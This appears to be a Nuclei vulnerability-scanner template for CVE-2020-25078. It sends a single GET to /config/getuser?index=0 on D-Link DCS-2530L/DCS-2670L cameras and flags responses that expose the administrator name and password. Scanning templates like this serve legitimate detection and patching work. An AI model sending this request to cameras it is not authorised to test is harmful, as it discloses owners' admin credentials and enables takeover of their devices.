id: CVE-2020-25078

info:
  name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure
  author: pikpikcu
  severity: high
  description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosure because the /config/getuser endpoint allows remote disclosure of the administrator password.
  impact: |
    An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.
  remediation: |
    Update the camera firmware to the latest version to fix the vulnerability.
  reference:
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180
    - https://twitter.com/Dogonsecurity/status/1273251236167516161
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25078
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25078
    epss-score: 0.78949
    epss-percentile: 0.97964
    cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dcs-2530l_firmware
  tags: cve,cve2020,dlink

http:
  # Single GET to the user-config endpoint named in the description.
  - method: GET
    path:
      - "{{BaseURL}}/config/getuser?index=0"

    # All three matchers must hold for the template to report a finding.
    matchers-condition: and
    matchers:
      # Response must contain both credential fields.
      - type: word
        words:
          - "name="
          - "pass="
        condition: and

      # Response headers must indicate a plain-text body.
      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e965d262bb31eb40082be9dfd1296f5217892a6ab1cad51a285a6850e71a4188022079f8d8c381d12c0f12d84b30b0f73f9e788040d9f6155311dd1ded7cdf85806a:922c64590222798bb761d5b6d8e72950